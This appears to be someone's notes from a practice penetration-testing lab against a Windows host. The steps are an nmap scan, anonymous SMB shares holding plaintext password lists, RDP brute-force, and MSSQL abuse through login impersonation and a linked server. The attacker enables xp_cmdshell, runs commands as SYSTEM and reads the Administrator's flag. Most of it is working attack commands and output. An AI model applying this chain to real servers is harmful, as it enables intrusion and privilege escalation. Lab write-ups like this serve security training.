Acs Hard Lab
nmap
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HARD
| rdp-ntlm-info:
| Target_Name: WIN-HARD
| NetBIOS_Domain_Name: WIN-HARD
| NetBIOS_Computer_Name: WIN-HARD
| DNS_Domain_Name: WIN-HARD
| DNS_Computer_Name: WIN-HARD
| Product_Version: 10.0.17763
|_ System_Time: 2025-01-12T10:41:38+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-12T10:41:39
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.61 seconds
We have SMB and RDP. We should have MSSQL but it didn't fucking show up AGAIN. Motherfucker
Connecting to #SMB
smbclient \\\\10.129.38.189\\Home
it allows anonymous access
There's Fiona, John, and Simon in the IT group.
Fiona's Creds.txt
Windows Creds
kAkd03SA@#!
48Ns72!bns74@S84NNNSl
SecurePassword!
Password123!
SecureLocationforPasswordsd123!!
John's information.txt
To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.
John's secrets.txt
Password Lists:
1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123
Simon's random.txt
Credentials
(k20ASD10934kadA
KDIlalsa9020$
JT9ads02lasSA@
Kaksd032klasdA#
LKads9kasd0-@
brute-force RDP
fiona:48Ns72!bns74@S84NNNSl
Connect to RDP
in PowerShell, check running processes
Get-Process
238 13 14940 17032 3308 0 sqlceip 716 209 313660 198372 2680 0 sqlservr 141 9 2020 7676 2720 0 sqlwriter
We can see that MSSQL is running in the processs.
Connect to MSSQL
since we know mssql is running, we can connect to it from our attacking linux machine.
Fiona is a local Windows users so use .\\
sqsh -S 10.129.38.122 -U '.\\fiona' -P '48Ns72!bns74@S84NNNSl' -h
we can also connect to it via the Windows RDP cmd.exe by just typing
sqlcmd
Checking for linked servers
Communicate with Other Databases with MSSQL in MSSQL
#mssql_linked_server #mssql
1> SELECT srvname, isremote FROM sysservers
2> go
WINSRV02\SQLEXPRESS
1
LOCAL.TEST.LINKED.SRV
0
there is a linked server SQLEXPRESS
identify which user(s) we can impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> go
john
simon
According to the hint, impersonate john
1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go
john
0
see that we can indeed execute statement in the linked server
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
2> go
WINSRV02\SQLEXPRESS
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Bu
ild 17763: ) (Hypervisor)
testadmin
enable xp_cmdshell and execute whoami
1> EXECUTE('
2> EXEC sp_configure ''show advanced options'', 1;
3> RECONFIGURE;
4> EXEC sp_configure ''xp_cmdshell'', 1;
5> RECONFIGURE;
6> EXEC xp_cmdshell ''whoami''
7> ') AT [LOCAL.TEST.LINKED.SRV];
8> go
1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
2> go
nt authority\system
reading the flag
EXECUTE('xp_cmdshell "type C:\Users\Administrator\Desktop\flag.txt >c:\users\fiona\desktop\x.txt"') AT [LOCAL.TEST.LINKED.SRV]
go
this moves the flag to fiona's desktop for us to read.